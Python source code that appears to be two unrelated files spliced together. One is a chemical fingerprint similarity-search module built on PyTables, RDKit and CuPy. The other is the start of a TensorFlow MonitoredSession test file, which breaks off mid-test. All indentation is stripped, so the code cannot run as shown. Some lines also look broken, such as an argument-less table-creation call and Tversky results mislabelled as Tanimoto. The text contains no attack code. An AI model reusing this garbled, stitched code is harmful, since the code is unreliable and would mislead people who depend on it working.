def __init__(self, fp_filename: str, fp_signature: str, in_memory_fps: bool = True, fps_sort: bool = False) -> None:
super(PyTablesMultiFpStorageBackend, self).__init__(fp_filename)
self.name = "pytables"
# Get table signatures
with tb.open_file(self.fp_filename, mode="r") as fp_file:
self._fp_table_mappings = {}
for simfp_group in fp_file.walk_groups('/similarity_info/'):
if len(simfp_group._v_name):
fp_table = fp_file.get_node(simfp_group, 'fps', classname='Table')
self._fp_table_mappings[fp_table.attrs.fp_id] = [f'/similarity_info/{simfp_group._v_name}/fps',
f'/similarity_info/{simfp_group._v_name}/popcounts']
if fp_signature not in self._fp_table_mappings.keys():
raise ValueError(f'fingerprint not available, must be one of {", ".join(self._fp_table_mappings.keys())}')
self._current_fp = fp_signature
self._current_fp_path = self._fp_table_mappings[fp_signature][0]
self._current_popcounts_path = self._fp_table_mappings[fp_signature][1]
self.fp_type, self.fp_params, self.rdkit_ver = self.read_parameters()
self._fp_func = get_fp_from_name(self.fp_type, **self.fp_params)
if in_memory_fps:
self.load_fps(in_memory_fps, fps_sort)
self.load_popcnt_bins(fps_sort)
with tb.open_file(self.fp_filename, mode="r") as fp_file:
self.chunk_size = fp_file.get_node(self._current_fp_path).chunkshape[0] * 120
def read_parameters(self) -> Tuple[str, Dict[str, Dict[str, dict]], str]:
"""Reads fingerprint parameters for the current fingerprint."""
with tb.open_file(self.fp_filename, mode="r") as fp_file:
rdkit_ver = fp_file.root.config[0]
fp_table = fp_file.get_node(self._current_fp_path)
fp_type = fp_table.attrs.fp_type
fp_params = json.loads(fp_table.attrs.fp_params)
return fp_type, fp_params, rdkit_ver
def get_fps_chunk(self, chunk_range: Tuple[int, int]) -> np.asarray:
with tb.open_file(self.fp_filename, mode="r") as fp_file:
fps = fp_file.get_node(self._current_fp_path)[slice(*chunk_range)]
return fps
def load_popcnt_bins(self, fps_sort: bool) -> None:
if fps_sort:
popcnt_bins = self.calc_popcnt_bins(self.fps)
else:
with tb.open_file(self.fp_filename, mode="r") as fp_file:
popcnt_bins = fp_file.get_node(self._current_popcounts_path).read()
self.popcnt_bins = popcnt_bins
def load_fps(self, in_memory_fps, fps_sort) -> None:
"""Loads FP db file into memory for the current fingerprint.
Parameters
----------
in_memory_fps : bool
Whether if the FPs should be loaded into memory or not.
fps_sort: bool
Whether if the FPs should be sorted or not.
Returns
-------
fps: numpy array
Numpy array with the fingerprints.
"""
with tb.open_file(self.fp_filename, mode="r") as fp_file:
fps = fp_file.get_node(self._current_fp_path)[:]
# files should be sorted but if the file is updated without sorting it
# can be also in memory sorted
if fps_sort:
fps.sort(order="popcnt")
num_fields = len(fps[0])
fps = fps.view("<u8")
fps = fps.reshape(int(fps.size / num_fields), num_fields)
self.fps = fps
def delete_fps(self, ids_list: List[int]) -> None:
"""Delete FPs given a list of ids for the current fingerprint.
Parameters
----------
ids_list : list
ids to delete.
Returns
-------
None
"""
with tb.open_file(self.fp_filename, mode="a") as fp_file:
fps_table = fp_file.get_node(self._current_fp_path)
for fp_id in ids_list:
to_delete = [
row.nrow
for row in fps_table.where("fp_id == {}".format(str(fp_id)))
]
fps_table.remove_row(to_delete[0])
def append_fps(self, supplier: MolSupplier, progress: bool=True, total: Optional[int]=None, sort: bool = True) -> None:
"""Appends FPs to the file for the fingerprint currently selected."""
with tb.open_file(self.fp_filename, mode="a") as fp_file:
fps_table = fp_file.get_node(self._current_fp_path)
fps = []
supplier.set_start_progress_total(max((row['fp_id'] for row in fps_table.iterrows()), default=1),
progress, total)
for mol_id, rdmol in supplier:
if not rdmol:
continue
fp = self._fp_func.get(rdmol)
fps.append((mol_id, *fp))
if len(fps) == BATCH_WRITE_SIZE:
fps_table.append(fps)
fps = []
# append last batch < 32k
if fps:
fps_table.append(fps)
if sort:
sort_db_file(self.fp_filename, verbose=progress)
def change_fp_for_append(self, fingerprint: Fingerprint):
"""Create an empty table and change the fingerprint to be used for appending."""
self._current_fp = str(fingerprint)
# Determine schema
particle = create_schema(fingerprint.length)
filters = tb.Filters()
# Create table
with tb.open_file(self.fp_filename, mode="a") as fp_file:
# Group for new fingerprint
fp_file.create_table('/similarity_info/', )
fp_group = fp_file.create_group('/similarity_info/', self._current_fp, f'Similarity {self._current_fp}')
# New table
particle = create_schema(fingerprint.length)
fp_table = fp_file.create_table(fp_group, 'fps', particle, 'Similarity FPs', expectedrows=1300000,
filters=filters)
# New attributes
fp_table.attrs.fp_type = fingerprint.name
fp_table.attrs.fp_id = self._current_fp
fp_table.attrs.length = fingerprint.length
fp_table.attrs.fp_params = json.dumps(fingerprint.params)
# New Popcounts
popcounts = fp_file.create_vlarray(fp_group, 'popcounts', tb.ObjectAtom(), f'Popcounts of {fp_group._v_name}')
self._current_fp_path = f'/similarity_info/{fp_group._v_name}/fps'
self._current_popcounts_path = f'/similarity_info/{fp_group._v_name}/popcounts'
self.fp_type, self.fp_params, self.rdkit_ver = self.read_parameters()
self._fp_func = get_fp_from_name(self.fp_type, **self.fp_params)
print('Empty table created, make sure to call "append_fps" to populate it!')
class BaseMultiFpEngine(BaseEngine, ABC):
def __init__(
self,
fp_filename: str,
fp_signature: str,
storage_backend: str,
in_memory_fps: bool,
fps_sort: bool,
) -> None:
self.fp_filename = fp_filename
self.in_memory_fps = in_memory_fps
if storage_backend == "pytables":
self.storage = PyTablesMultiFpStorageBackend(
fp_filename, fp_signature, in_memory_fps=in_memory_fps, fps_sort=fps_sort
)
def load_query(self, query_string: str) -> np.ndarray:
"""Loads the query molecule from SMILES, molblock or InChI.
Parameters
----------
query_string : str
SMILES, InChi or molblock.
Returns
-------
query : numpy array
Numpy array query molecule.
"""
rdmol = load_molecule(query_string)
if rdmol is None:
raise ValueError('molecule could not be parsed')
fp = get_fp_from_name(self.fp_type, **self.fp_params).get(rdmol)
return np.array((0, *fp), dtype=np.uint64)
def _get_mapping(self, ids: Union[List[int], int]):
"""Get the Papyrus identifiers corresponding to the given indices"""
if not isinstance(ids, list):
ids = [ids]
if not len(ids):
raise ValueError('indices must be supplied')
for id in ids:
if int(id) != id:
raise ValueError('indices must be integers')
with tb.open_file(self.fp_filename) as fp_file:
if max(ids) > max(fp_file.get_node(self.storage._current_fp_path).cols.fp_id):
raise ValueError(f'index not in database: {max(ids)}')
# Get data fields from mol_mappings table
mappings_table = fp_file.root.mol_mappings
colnames = mappings_table.cols._v_colnames
data = []
for id in ids:
pointer = mappings_table.where(f"idnumber == {id}")
try:
data.append(next(pointer).fetch_all_fields())
except StopIteration:
raise ValueError(f'could not find index {id}')
return pd.DataFrame.from_records(data, columns=colnames)
class FPSubSim2Engine(BaseMultiFpEngine, FPSim2Engine):
"""FPSubSim2 class to run fast CPU similarity searches."""
def __init__(
self,
fp_filename: str,
fp_signature: str,
in_memory_fps: bool = True,
fps_sort: bool = False,
storage_backend: str = "pytables",
) -> None:
"""FPSubSim2 class to run fast CPU similarity searches.
:param fp_filename : Fingerprints database file path.
:param in_memory_fps: Whether if the FPs should be loaded into memory or not.
:param fps_sort: Whether if the FPs should be sorted by popcnt after being loaded into memory or not.
:param storage_backend: Storage backend to use (only pytables available at the moment).
"""
super(FPSubSim2Engine, self).__init__(
fp_filename=fp_filename,
fp_signature=fp_signature,
storage_backend=storage_backend,
in_memory_fps=in_memory_fps,
fps_sort=fps_sort,
)
self.empty_sim = np.ndarray((0,), dtype=[("mol_id", "<u4"), ("coeff", "<f4")])
self.empty_subs = np.ndarray((0,), dtype="<u4")
def similarity(self, query_string: str, threshold: float, n_workers: int = 1) -> pd.DataFrame:
"""Perform in-memory Tanimoto similarity search.
:param query_string:
:param threshold:
:param n_workers:
:return:
"""
data = list(zip(*FPSim2Engine.similarity(self, query_string, threshold, n_workers)))
if not len(data):
return pd.DataFrame([], columns=['idnumber', 'connectivity', 'InChIKey', f'Tanimoto > {threshold} ({self.storage._current_fp})'])
ids, similarities = data
ids, similarities = list(ids), list(similarities)
data = self._get_mapping(ids)
data[f'Tanimoto > {threshold} ({self.storage._current_fp})'] = similarities
# Decode byte columns
for col, dtype in data.dtypes.items():
if dtype == object:
data[col] = data[col].apply(lambda x: x.decode('utf-8'))
return data
def on_disk_similarity(self, query_string: str, threshold: float, n_workers: int=1, chunk_size: int=0):
"""Perform Tanimoto similarity search on disk.
:param query_string:
:param threshold:
:param n_workers:
:param chunk_size:
:return:
"""
data = list(zip(*FPSim2Engine.on_disk_similarity(self, query_string, threshold, n_workers, chunk_size)))
if not len(data):
return pd.DataFrame([], columns=['idnumber', 'connectivity', 'InChIKey', f'Tanimoto > {threshold} ({self.storage._current_fp})'])
ids, similarities = data
ids, similarities = list(ids), list(similarities)
data = self._get_mapping(ids)
data[f'Tanimoto > {threshold} ({self.storage._current_fp})'] = similarities
# Decode byte columns
for col, dtype in data.dtypes.items():
if dtype == object:
data[col] = data[col].apply(lambda x: x.decode('utf-8'))
return data
def tversky(self, query_string: str, threshold: float, a: float, b: float, n_workers: int = 1):
"""Perform in-memory Tversky similarity search.
:param query_string:
:param threshold:
:param a:
:param b:
:param n_workers:
:return:
"""
data = list(zip(*FPSim2Engine.tversky(self, query_string, threshold, a, b, n_workers)))
if not len(data):
return pd.DataFrame([], columns=['idnumber', 'connectivity', 'InChIKey', f'Tversky > {threshold} ({self.storage._current_fp})'])
ids, similarities = data
ids, similarities = list(ids), list(similarities)
data = self._get_mapping(ids)
data[f'Tanimoto > {threshold} ({self.storage._current_fp})'] = similarities
# Decode byte columns
for col, dtype in data.dtypes.items():
if dtype == object:
data[col] = data[col].apply(lambda x: x.decode('utf-8'))
return data
def on_disk_tversky(self, query_string: str, threshold: float, a: float, b: float, n_workers: int = 1, chunk_size: int = None):
"""Perform Tversky similarity search on disk.
:param query_string:
:param threshold:
:param a:
:param b:
:param n_workers:
:param chunk_size:
:return:
"""
data = list(zip(*FPSim2Engine.on_disk_tversky(self, query_string, threshold, a, b, n_workers, chunk_size)))
if not len(data):
return pd.DataFrame([], columns=['idnumber', 'connectivity', 'InChIKey', f'Tversky > {threshold} ({self.storage._current_fp})'])
ids, similarities = data
ids, similarities = list(ids), list(similarities)
data = self._get_mapping(ids)
data[f'Tanimoto > {threshold} ({self.storage._current_fp})'] = similarities
# Decode byte columns
for col, dtype in data.dtypes.items():
if dtype == object:
data[col] = data[col].apply(lambda x: x.decode('utf-8'))
return data
def substructure(self, query_string: str, n_workers: int = 1):
raise ValueError('use FPSubSim2 substructure library granting subgraph isomorphism')
def on_disk_substructure(self, query_string: str, n_workers: int = 1, chunk_size: int = None):
raise ValueError('use FPSubSim2 substructure library granting subgraph isomorphism')
class FPSubSim2CudaEngine(BaseMultiFpEngine, FPSim2CudaEngine):
"""FPSubSim2 class to run fast GPU similarity searches."""
def __init__(
self,
fp_filename: str,
fp_signature: str,
storage_backend: str = "pytables",
kernel: str='raw'
) -> None:
"""FPSubSim2 class to run fast CPU similarity searches.
:param fp_filename : Fingerprints database file path.
:param in_memory_fps: Whether if the FPs should be loaded into memory or not.
:param fps_sort: Whether if the FPs should be sorted by popcnt after being loaded into memory or not.
:param storage_backend: Storage backend to use (only pytables available at the moment).
"""
if isinstance(cupy, ImportError):
raise ImportError('Some required dependencies are missing:\n\tcupy')
super(FPSubSim2CudaEngine, self).__init__(
fp_filename=fp_filename,
fp_signature=fp_signature,
storage_backend=storage_backend,
in_memory_fps=True,
fps_sort=False,
)
if kernel not in ['raw', 'element_wise']:
raise ValueError("only supports 'raw' and 'element_wise' kernels")
self.kernel = kernel
if kernel == "raw":
# copy all the stuff to the GPU
self.cuda_db = cupy.asarray(self.fps[:, 1:-1])
self.cuda_ids = cupy.asarray(self.fps[:, 0])
self.cuda_popcnts = cupy.asarray(self.fps[:, -1])
self.cupy_kernel = cupy.RawKernel(
self.raw_kernel.format(block=self.cuda_db.shape[1]),
name="taniRAW",
options=("-std=c++14",),
)
elif self.kernel == "element_wise":
# copy the database to the GPU
self.cuda_db = cupy.asarray(self.fps)
self.cupy_kernel = cupy.ElementwiseKernel(
in_params="raw T db, raw U query, uint64 in_width, float32 threshold",
out_params="raw V out",
operation=self.ew_kernel,
name="taniEW",
options=("-std=c++14",),
reduce_dims=False,
)
def similarity(self, query_string: str, threshold: float) -> pd.DataFrame:
"""Tanimoto similarity search."""
data = list(zip(*FPSim2CudaEngine.similarity(self, query_string, threshold)))
if not len(data):
return pd.DataFrame([], columns=['idnumber', 'connectivity', 'InChIKey', f'Tanimoto > {threshold} ({self.storage._current_fp})'])
ids, similarities = data
ids, similarities = list(ids), list(similarities)
data = self._get_mapping(ids)
data[f'Tanimoto > {threshold} ({self.storage._current_fp})'] = similarities
return data
class SubstructureLibrary(SubstructLibrary):
def __init__(self, fp_file_name):
"""Extenstion of RDKIT's rdSubstructLibrary to support mappings.
:param fp_file_name: file containing the molecular mappings of the substructure library
"""
super(SubstructureLibrary, self).__init__()
self.lib = SubstructLibrary(CachedMolHolder(), PatternHolder())
self.fp_filename = fp_file_name
def _get_mapping(self, ids: Union[List[int], int]):
"""Get the Papyrus identifiers corresponding to the given indices"""
if not isinstance(ids, list):
ids = [ids]
if not len(ids):
raise ValueError('indices must be supplied')
for id in ids:
if int(id) != id:
raise ValueError('indices must be integers')
with tb.open_file(self.fp_filename) as fp_file:
if max(ids) > max(fp_file.root.mol_mappings.cols.idnumber):
raise ValueError(f'index not in database: {max(ids)}')
# Get data fields from mol_mappings table
mappings_table = fp_file.root.mol_mappings
colnames = mappings_table.cols._v_colnames
data = []
for id in ids:
pointer = mappings_table.where(f"idnumber == {id}")
try:
data.append(next(pointer).fetch_all_fields())
except StopIteration:
raise ValueError(f'could not find index {id}')
data = pd.DataFrame.from_records(data, columns=colnames)
# Decode byte columns
for col, dtype in data.dtypes.items():
if dtype == object:
data[col] = data[col].apply(lambda x: x.decode('utf-8'))
return data
def GetMatches(self, query: Union[str, Chem.Mol], recursionPossible: bool=True, useChirality: bool=True,
useQueryQueryMatches: bool=False, numThreads: int=-1, maxResults: int=-1):
if isinstance(query, str):
query = load_molecule(query)
ids = list(super(SubstructureLibrary, self).GetMatches(query=query,
recursionPossible=recursionPossible,
useChirality=useChirality,
useQueryQueryMatches=useQueryQueryMatches,
numThreads=numThreads,
maxResults=maxResults))
return self._get_mapping(ids)
def substructure(self, query: Union[str, Chem.Mol]):
return self.GetMatches(query)
|
monitored_session_test.py
|
# pylint: disable=g-bad-file-header
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for monitored_session."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import glob
import os
import sys
import threading
import time
import traceback
from tensorflow.core.protobuf import config_pb2
from tensorflow.core.protobuf import debug_pb2
from tensorflow.python.client import session as session_lib
from tensorflow.python.distribute import collective_all_reduce_strategy
from tensorflow.python.distribute import distribute_coordinator
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors_impl
from tensorflow.python.framework import ops
from tensorflow.python.framework import test_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.ops import state_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import test
from tensorflow.python.summary import summary
from tensorflow.python.training import basic_session_run_hooks
from tensorflow.python.training import checkpoint_management
from tensorflow.python.training import coordinator
from tensorflow.python.training import monitored_session
from tensorflow.python.training import saver as saver_lib
from tensorflow.python.training import session_run_hook
from tensorflow.python.training import summary_io
from tensorflow.python.training import training_util
def latest_summaries(base_dir):
"""Parse summary events from latest event file in base_dir."""
file_paths = glob.glob(os.path.join(base_dir, 'events.*'))
file_path = sorted(file_paths)[-1] if file_paths else None
latest_events = summary_io.summary_iterator(file_path) if file_path else []
return [e for e in latest_events if e.HasField('summary')]
class ScaffoldTest(test.TestCase):
"""Scaffold tests."""
def test_nothing_created_before_finalize(self):
with ops.Graph().as_default():
scaffold = monitored_session.Scaffold()
self.assertEqual(None, scaffold.init_op)
self.assertEqual(None, scaffold.init_feed_dict)
self.assertEqual(None, scaffold.init_fn)
self.assertEqual(None, scaffold.ready_op)
self.assertEqual(None, scaffold.ready_for_local_init_op)
self.assertEqual(None, scaffold.local_init_op)
self.assertEqual(None, scaffold.saver)
def test_defaults_empty_graph(self):
with ops.Graph().as_default():
scaffold = monitored_session.Scaffold()
variables.VariableV1(1, name='my_var')
variables.VariableV1(
2, name='my_local_var', collections=[ops.GraphKeys.LOCAL_VARIABLES])
scaffold.finalize()
self.assertTrue(isinstance(scaffold.init_op, ops.Operation))
self.assertEqual(None, scaffold.init_feed_dict)
self.assertEqual(None, scaffold.init_fn)
self.assertTrue(isinstance(scaffold.ready_op, ops.Tensor))
self.assertTrue(isinstance(scaffold.ready_for_local_init_op, ops.Tensor))
self.assertTrue(isinstance(scaffold.local_init_op, ops.Operation))
self.assertEqual(None, scaffold.local_init_feed_dict)
self.assertTrue(isinstance(scaffold.saver, saver_lib.Saver))
with self.cached_session() as sess:
self.assertItemsEqual([b'my_var', b'my_local_var'],
sess.run(scaffold.ready_op))
self.assertItemsEqual([b'my_var'],
sess.run(scaffold.ready_for_local_init_op))
sess.run(scaffold.init_op)
self.assertEqual(0, len(sess.run(scaffold.ready_for_local_init_op)))
sess.run(scaffold.local_init_op)
self.assertEqual(0, len(sess.run(scaffold.ready_op)))
def test_defaults_no_variables(self):
with ops.Graph().as_default():
scaffold = monitored_session.Scaffold()
constant_op.constant(1, name='my_const')
scaffold.finalize()
self.assertTrue(isinstance(scaffold.init_op, ops.Operation))
self.assertEqual(None, scaffold.init_feed_dict)
self.assertEqual(None, scaffold.init_fn)
self.assertTrue(isinstance(scaffold.ready_op, ops.Tensor))
self.assertTrue(isinstance(scaffold.ready_for_local_init_op, ops.Tensor))
self.assertTrue(isinstance(scaffold.local_init_op, ops.Operation))
self.assertEqual(None, scaffold.local_init_feed_dict)
self.assertTrue(isinstance(scaffold.saver, saver_lib.Saver))
def test_caches_values(self):
with ops.Graph().as_default():
variables.VariableV1([1])
scaffold1 = monitored_session.Scaffold()
scaffold1.finalize()
scaffold2 = monitored_session.Scaffold()
scaffold2.finalize()
self.assertEqual(scaffold1.init_op, scaffold2.init_op)
self.assertEqual(scaffold1.ready_op, scaffold2.ready_op)
self.assertEqual(scaffold1.ready_for_local_init_op,
scaffold2.ready_for_local_init_op)
self.assertEqual(scaffold1.local_init_op, scaffold2.local_init_op)
self.assertEqual(scaffold1.saver, scaffold2.saver)
def test_raise_error_if_more_than_one_cached_item(self):
with ops.Graph().as_default():
variables.VariableV1([1])
ops.add_to_collection(ops.GraphKeys.SAVERS, saver_lib.Saver())
ops.add_to_collection(ops.GraphKeys.SAVERS, saver_lib.Saver())
with self.assertRaisesRegex(RuntimeError, 'More than one item'):
monitored_session.Scaffold().finalize()
def test_uses_passed_values(self):
with ops.Graph().as_default():
variables.VariableV1([1])
saver = saver_lib.Saver()
scaffold = monitored_session.Scaffold(
init_op=2,
init_feed_dict=3,
init_fn=lambda scaffold, sess: 4,
ready_op=5,
ready_for_local_init_op=6,
local_init_op=7,
local_init_feed_dict=8,
saver=saver)
scaffold.finalize()
self.assertEqual(2, scaffold.init_op)
self.assertEqual(3, scaffold.init_feed_dict)
self.assertTrue(callable(scaffold.init_fn))
self.assertEqual(5, scaffold.ready_op)
self.assertEqual(6, scaffold.ready_for_local_init_op)
self.assertEqual(7, scaffold.local_init_op)
self.assertEqual(8, scaffold.local_init_feed_dict)
self.assertEqual(saver, scaffold.saver)
def test_graph_is_finalized(self):
with ops.Graph().as_default():
variables.VariableV1([1])
monitored_session.Scaffold().finalize()
with self.assertRaisesRegex(RuntimeError,
'Graph is finalized and cannot be modified'):
constant_op.constant([0])
def test_new_scaffold_from_default_scaffold(self):
scaffold1 = monitored_session.Scaffold()
with ops.Graph().as_default():
variables.VariableV1([1])
saver = saver_lib.Saver()
scaffold2 = monitored_session.Scaffold(
init_op=2,
init_feed_dict=3,
init_fn=lambda scaffold, sess: 4,
ready_op=5,
ready_for_local_init_op=6,
local_init_op=7,
local_init_feed_dict=8,
saver=saver,
copy_from_scaffold=scaffold1)
scaffold2.finalize()
self.assertEqual(2, scaffold2.init_op)
self.assertEqual(3, scaffold2.init_feed_dict)
self.assertTrue(callable(scaffold2.init_fn))
self.assertEqual(5, scaffold2.ready_op)
self.assertEqual(6, scaffold2.ready_for_local_init_op)
self.assertEqual(7, scaffold2.local_init_op)
self.assertEqual(8, scaffold2.local_init_feed_dict)
self.assertEqual(saver, scaffold2.saver)
def test_new_scaffold_from_existing_scaffold(self):
with ops.Graph().as_default():
variables.VariableV1([1])
saver = saver_lib.Saver()
scaffold1 = monitored_session.Scaffold(
init_op=2,
init_feed_dict=3,
init_fn=lambda scaffold, sess: 4,
ready_op=5,
ready_for_local_init_op=6,
local_init_op=7,
local_init_feed_dict=8,
saver=saver)
scaffold2 = monitored_session.Scaffold(
init_op=4,
init_feed_dict=6,
init_fn=lambda scaffold, sess: 8,
ready_op=10,
ready_for_local_init_op=12,
local_init_op=14,
local_init_feed_dict=15,
saver=saver,
copy_from_scaffold=scaffold1)
scaffold2.finalize()
self.assertEqual(4, scaffold2.init_op)
self.assertEqual(6, scaffold2.init_feed_dict)
self.assertTrue(callable(scaffold2.init_fn))
self.assertEqual(10, scaffold2.ready_op)
self.assertEqual(12, scaffold2.ready_for_local_init_op)
self.assertEqual(14, scaffold2.local_init_op)
self.assertEqual(15, scaffold2.local_init_feed_dict)
self.assertEqual(saver, scaffold2.saver)
def test_copy_from_scaffold_is_scaffold(self):
with ops.Graph().as_default():
with self.assertRaisesRegex(
TypeError, 'copy_from_scaffold is not a Scaffold instance'):
monitored_session.Scaffold(copy_from_scaffold=1)
def _test_dir(temp_dir, test_name):
"""Create an empty dir to use for tests.
Args:
temp_dir: Tmp directory path.
test_name: Name of the test.
Returns:
Absolute path to the test directory.
"""
test_dir = os.path.join(temp_dir, test_name)
if os.path.isdir(test_dir):
for f in glob.glob('%s/*' % test_dir):
os.remove(f)
else:
os.makedirs(test_dir)
return test_dir
class FakeHook(session_run_hook.SessionRunHook):
def __init__(self):
self.should_stop = False
self.request = None
self.call_counter = collections.Counter()
self.last_run_context = None
self.last_run_values = None
def begin(self):
self.call_counter['begin'] += 1
def after_create_session(self, session, coord): # pylint: disable=unused-argument
self.call_counter['after_create_session'] += 1
def before_run(self, run_context):
self.call_counter['before_run'] += 1
self.last_run_context = run_context
return self.request
def after_run(self, run_context, run_values):
self.call_counter['after_run'] += 1
self.last_run_values = run_values
if self.should_stop:
run_context.request_stop()
def end(self, session):
self.call_counter['end'] += 1
class MonitoredTrainingSessionTest(test.TestCase):
"""Tests MonitoredTrainingSession."""
def test_saving_restoring_checkpoint(self):
logdir = _test_dir(self.get_temp_dir(), 'test_saving_restoring_checkpoint')
with ops.Graph().as_default():
gstep = training_util.get_or_create_global_step()
do_step = state_ops.assign_add(gstep, 1)
with monitored_session.MonitoredTrainingSession(
is_chief=True, checkpoint_dir=logdir) as session:
self.assertEqual(0, session.run(gstep))
self.assertEqual(1, session.run(do_step))
self.assertEqual(2, session.run(do_step))
# A restart will find the checkpoint and recover automatically.
with monitored_session.MonitoredTrainingSession(
is_chief=True, checkpoint_dir=logdir) as session:
self.assertEqual(2, session.run(gstep))
def test_save_checkpoint_steps(self):
logdir = _test_dir(self.get_temp_dir(), 'test_save_checkpoint_steps')
with ops.Graph().as_default():
gstep = training_util.get_or_create_global_step()
new_gstep = state_ops.assign_add(gstep, 1)
with monitored_session.MonitoredTrainingSession(
is_chief=True,
checkpoint_dir=logdir,
save_checkpoint_steps=100,
log_step_count_steps=10) as session:
for _ in range(100):
session.run(new_gstep)
# A restart will find the checkpoint and recover automatically.
with monitored_session.MonitoredTrainingSession(
is_chief=True, checkpoint_dir=logdir) as session:
self.assertEqual(100, session.run(gstep))
def test_save_checkpoint_secs(self):
logdir = _test_dir(self.get_temp_dir(), 'test_save_checkpoint_secs')
with ops.Graph().as_default():
gstep = training_util.get_or_create_global_step()
new_gstep = state_ops.assign_add(gstep, 1)
with monitored_session.MonitoredTrainingSession(
is_chief=True,
checkpoint_dir=logdir,
save_checkpoint_secs=0.1,
log_step_count_steps=10) as session:
session.run(new_gstep)
time.sleep(0.2)
for _ in range(10):
session.run(new_gstep)
# A restart will find the checkpoint and recover automatically.
with monitored_session.MonitoredTrainingSession(
is_chief=True, checkpoint_dir=logdir) as session:
self.assertEqual(11, session.run(gstep))
def test_summaries_steps(self):
logdir = _test_dir(self.get_temp_dir(), 'test_summaries_steps')
with ops.Graph().as_default():
gstep = training_util.get_or_create_global_step()
new_gstep = state_ops.assign_add(gstep, 1)
summary.scalar('my_summary_tag', new_gstep * 2)
with monitored_session.MonitoredTrainingSession(
is_chief=True,
checkpoint_dir=logdir,
save_summaries_steps=100,
log_step_count_steps=10) as session:
for _ in range(101):
session.run(new_gstep)
summaries = latest_summaries(logdir)
tags = [s.summary.value[0].tag for s in summaries]
self.assertIn('my_summary_tag', tags)
self.assertIn('global_step/sec', tags)
def test_summaries_secs(self):
logdir = _test_dir(self.get_temp_dir(), 'test_summaries_secs')
with ops.Graph().as_default():
gstep = training_util.get_or_create_global_step()
new_gstep = state_ops.assign_add(gstep, 1)
summary.scalar('my_summary_tag', new_gstep * 2)
with monitored_session.MonitoredTrainingSession(
is_chief=True,
checkpoint_dir=logdir,
save_summaries_steps=None,
save_summaries_secs=0.1,
log_step_count_steps=10) as session:
session.run(new_gstep)
time.sleep(0.2)
for _ in range(101):
session.run(new_gstep)
summaries = latest_summaries(logdir)
tags = [s.summary.value[0].tag for s in summaries]
self.assertIn('my_summary_tag', tags)
self.assertIn('global_step/sec', tags)
def test_custom_saving(self):
logdir = _test_dir(self.get_temp_dir(), 'test_saving_restoring_checkpoint')
fake_hook = FakeHook()
with ops.Graph().as_default():
gstep = training_util.get_or_create_global_step()
do_step = state_ops.assign_add(gstep, 1)
with monitored_session.MonitoredTrainingSession(
is_chief=True,
checkpoint_dir=logdir,
chief_only_hooks=[fake_hook],
save_checkpoint_secs=0) as session:
self.assertEqual(0, session.run(gstep))
self.assertEqual(1, session.run(do_step))
self.assertEqual(2, session.run(do_step))
# Check whether custom hook called or not
self.assertEqual(1, fake_hook.call_counter['begin'])
# A restart will not find the checkpoint, since we didn't save.
with monitored_session.MonitoredTrainingSession(
is_chief=True, checkpoint_dir=logdir) as session:
self.assertEqual(0, session.run(gstep))
def test_save_graph_def(self):
logdir = _test_dir(self.get_temp_dir(), 'test_save_graph_def')
with ops.Graph().as_default():
gstep = training_util.get_or_create_global_step()
new_gstep = state_ops.assign_add(gstep, 1)
with monitored_session.MonitoredTrainingSession(
is_chief=True,
checkpoint_dir=logdir,
save_checkpoint_steps=1,
save_graph_def=True) as session:
self.assertIn('graph.pbtxt', os.listdir(logdir))
self.assertLen(glob.glob(os.path.join(logdir, '*.meta')), 1)
session.run(new_gstep)
self.assertLen(glob.glob(os.path.join(logdir, '*.meta')), 2)
def test_save_graph_def_false(self):
logdir = _test_dir(self.get_temp_dir(), 'test_save_graph_def')
with ops.Graph().as_default():
gstep = training_util.get_or_create_global_step()
new_gstep = state_ops.assign_add(gstep, 1)
with monitored_session.MonitoredTrainingSession(
is_chief=True,
checkpoint_dir=logdir,
save_checkpoint_steps=1,
save_graph_def=False) as session:
self.assertNotIn('graph.pbtxt', os.listdir(logdir))
self.assertEmpty(glob.glob(os.path.join(logdir, '*.meta')))
session.run(new_gstep)
self.assertEmpty(glob.glob(os.path.join(logdir, '*.meta')))
class MockExtended(object):
def __init__(self, between_graph, should_init, should_checkpoint,
should_save_summary):
self.experimental_between_graph = between_graph
self.experimental_should_init = should_init
self.should_checkpoint = should_checkpoint
self.should_save_summary = should_save_summary
class MockStrategy(object):
def __init__(self,
between_graph=False,
should_init=True,
should_checkpoint=None,
should_save_summary=None):
self.extended = MockExtended(between_graph, should_init, should_checkpoint,
should_save_summary)
class MonitoredTrainingSessionWithDistributeCoordinatorTest(test.TestCase):
"""Test distribute coordinator controls summary saving and checkpointing."""
def test_summary_hook_enabled(self):
context = distribute_coordinator._WorkerContext(
MockStrategy(should_save_summary=True), None, None, None)
logdir = _test_dir(self.get_temp_dir(), 'test_summaries_enabled')
with ops.Graph().as_default():
gstep = training_util.get_or_create_global_step()
new_gstep = state_ops.assign_add(gstep, 1)
summary.scalar('my_summary_tag', new_gstep * 2)
with context, monitored_session.MonitoredTrainingSession(
checkpoint_dir=logdir,
save_summaries_steps=100,
log_step_count_steps=10) as session:
for _ in range(101):
session.run(new_gstep)
summaries = latest_summaries(logdir)
tags = [s.summary.value[0].tag for s in summaries]
self.assertIn('my_summary_tag', tags)
self.assertIn('global_step/sec', tags)
def test_summary_hook_disabled(self):
context = distribute_coordinator._WorkerContext(
MockStrategy(should_save_summary=False), None, None, None)
logdir = _test_dir(self.get_temp_dir(), 'test_summaries_disabled')
with ops.Graph().as_default():
gstep = training_util.get_or_create_global_step()
new_gstep = state_ops.assign_add(gstep, 1)
summary.scalar('my_summary_tag', new_gstep * 2)
with context, monitored_session.MonitoredTrainingSession(
checkpoint_dir=logdir,
save_summaries_steps=100,
log_step_count_steps=10) as session:
for _ in range(101):
session.run(new_gstep)
# No summary is saved.
summaries = latest_summaries(logdir)
self.assertEqual(len(summaries), 0)
def test_checkpoint_hook_enabled(self):
context = distribute_coordinator._WorkerContext(
